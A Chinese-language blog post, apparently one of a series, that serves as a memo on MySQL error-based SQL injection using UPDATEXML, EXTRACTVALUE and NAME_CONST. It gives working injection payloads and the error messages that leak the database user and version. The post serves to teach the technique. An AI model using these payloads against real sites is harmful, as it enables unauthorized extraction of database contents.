本来在上一篇文章中本来说了要把报错注入和出错的原因写完的,但是想了下大多数的报错并不像双查询报错那样原理复杂,很多只是函数的问题,所以这一篇就单纯的作为报错的备忘录,稍带原理

1.Updatexml报错

mysql> help updatexml
Name: 'UPDATEXML'
Description:
Syntax:
UpdateXML(xml_target, xpath_expr, new_xml)

This function replaces a single portion of a given fragment of XML
markup xml_target with a new XML fragment new_xml, and then returns the
changed XML. The portion of xml_target that is replaced matches an
XPath expression xpath_expr supplied by the user.

If no expression matching xpath_expr is found, or if multiple matches
are found, the function returns the original xml_target XML fragment.
All three arguments should be strings.

URL: http://dev.mysql.com/doc/refman/5.7/en/xml-functions.html

Examples:
mysql> SELECT
    ->   UpdateXML('<a><b>ccc</b><d></d></a>', '/a', '<e>fff</e>') AS val1,
    ->   UpdateXML('<a><b>ccc</b><d></d></a>', '/b', '<e>fff</e>') AS val2,
    ->   UpdateXML('<a><b>ccc</b><d></d></a>', '//b', '<e>fff</e>') AS val3,
    ->   UpdateXML('<a><b>ccc</b><d></d></a>', '/a/d', '<e>fff</e>') AS val4,
    ->   UpdateXML('<a><d></d><b>ccc</b><d></d></a>', '/a/d', '<e>fff</e>') AS val5
    -> \G

*************************** 1. row ***************************
val1: <e>fff</e>
val2: <a><b>ccc</b><d></d></a>
val3: <a><e>fff</e><d></d></a>
val4: <a><b>ccc</b><e>fff</e></a>
val5: <a><d></d><b>ccc</b><d></d></a>

可见函数要求第二个参数为xpath格式的字符串,否则就爆出符号错误

mysql> select * from users where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));
ERROR 1105 (HY000): XPATH syntax error: '~root@localhost~'

2 . Extractvalue报错 这个函数和updatexml一样,都是对xml格式数据进行操作,第二个参数也为xpath格式字符串,具体可以help

mysql> select * from users where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));
ERROR 1105 (HY000): XPATH syntax error: '~root@localhost~'

3 . Name_const报错 首先在这里补一个背景知识

  1. 在4.1版本后的mysql中支持subquery:也就是一个查询的结果可以作为另一个查询的from对象,可以说是像这样(select * from(select * from a)x)嵌套查询,这里的x是as x的意思也就是alias,子查询需要alias成一个符号才不会报错

ok,先来看看name_cast的help文档

mysql> help name_const
Name: 'NAME_CONST'
Description:
Syntax:
NAME_CONST(name,value)

Returns the given value. When used to produce a result set column,
NAME_CONST() causes the column to have the given name. The arguments
should be constants.

mysql> SELECT NAME_CONST('myname', 14);
+--------+
| myname |
+--------+
|     14 |
+--------+

URL: http://dev.mysql.com/doc/refman/5.7/en/miscellaneous-functions.html

这是根据name和value生成一个column的函数,结合前面的背景知识我们可以试图构造出和双查询类似的具有相同key值的错误,不过可惜这个利用在高版本中被要求为constants,不然就会先报这个错误,等于是加了个检测,但是在下面的测试中我发现有意外

mysql> select * from users where id=1 and (select * from (select name_const(version(),1),name_const(version(),1))a);
ERROR 1060 (42S21): Duplicate column name '5.7.17'
mysql> select * from users where id=1 and (select * from (select name_const(database(),1),name_const(database(),1))a);
ERROR 1210 (HY000): Incorrect arguments to NAME_CONST
mysql> select * from users where id=1 and (select * from (select name_const((select 1),1),name_const((select 1),1))a);
ERROR 1210 (HY000): Incorrect arguments to NAME_CONST

发现了吧 version()还是可以爆出来的…

还有一些网上写的函数发现本地没有爆出来,就暂时不写上来了,下一篇盲注